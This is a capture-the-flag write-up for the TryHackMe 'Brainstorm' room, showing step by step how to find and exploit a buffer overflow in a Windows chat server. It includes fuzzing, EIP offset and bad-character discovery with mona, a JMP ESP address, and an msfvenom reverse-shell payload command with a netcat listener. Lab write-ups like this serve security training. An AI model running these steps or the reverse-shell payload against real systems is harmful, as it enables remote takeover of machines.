TryHackMe — Brainstorm

Reverse engineer a chat program and write a script to exploit a Windows machine.

Image for post
Image for post

NMAP Scan:

nmap -sC -sV -Pn -T4 10.10.175.210 — disable-arp -oX chatserver_nmap.xml

  • sC = default scrip scan
  • sV = version scan
  • n = disable DNS resolution
  • T4 = Aggressive scan
Image for post
Image for post

First step is to grab the chatserver.exe and essfunc.dll using ftp from the target machine to your local machine for debugging.

Image for post
Image for post

Open Immunity Debugger as Administrator from your local machine then attach chatserver.exe and hit F9 to run the program.

Image for post
Image for post

Check how the application behaves using netcat. The vulnerable part of this application is the “Write a message:”.

Image for post
Image for post

Simple python script that will send bunch of As to the application:

Image for post
Image for post

This script will try to send 2500 As and check if the chatserver crashes.

Run python script:

Image for post
Image for post

Successfully crashed the application and overwritten the EIP:

Image for post
Image for post

Check the exact EIP offset using msf-pattern_create -l 2500.

  • l = length of the pattern
Image for post
Image for post

Copy the output then replace the 2500 As with it from the python script.

Image for post
Image for post

Go back to the Immunity debugger then hit F12 to restart then hit F9 again to run the chatserver.exe

Image for post
Image for post

Execute python script again then check Immunity. Once again we have crashed the application but this time take note of the EIP address.

Image for post
Image for post

Locate the exact offset of EIP using !mona or msf-pattern_offset:

Using mona:

Image for post
Image for post

Using msf:

Image for post
Image for post

Edit python script and change the pattern back to bunch of As but now multiplied by 2012 as the result of the EIP offset. In addition, running this script should overwrite the EIP with 4 Bs or 42424242.

Image for post
Image for post

Once again, restart the Immunity debugger and run the chatserver.exe then execute the python script.

Image for post
Image for post

Now that we have confirmed that we have overwritten the EIP, let’s now check for bad chars.

Generate bytearray in Immunity debugger using mona:

Set working folder in Immunity Debugger:

!mona config -set workingfolder c:\mona\%p

!mona bytearray -b “\x00”

Edit python script to add byte arrays, you can search for these badchars in google just don’t forget to remove the “\x00”.

Image for post
Image for post

Restart the immunity debugger and run the chatserver.exe then run the python script. Once again, the application crashed. Let’s compare the bytearray to our ESP address:

!mona compare -f C:\mona\chatserver\bytearray.bin -a 018DEEC0

Image for post
Image for post
Image for post
Image for post

Let’s now locate a jump point address.

!mona jmp -r esp -cpb “\x00”

Image for post
Image for post

Copy one jmp esp address then edit our python script:

Transform to address to little endian:

625014DF = \xdf\x14\x50\x62

Add NOP Sled before the payload:

“\x90” * 32

Create msfpayload:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.203.128 LPORT=4444 -f python — var-name buffer EXITFUNC=thread -b “\x00”

Image for post
Image for post

Run netcat listener then run the script:

nc -lvnp 4444

Image for post
Image for post

To exploit the TryHackMe box, you just need to change the payload in accordance to the target’s IP address.

References:

Written by

Experienced Network Security Engineer with a demonstrated history of working in the field of IT security industry.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store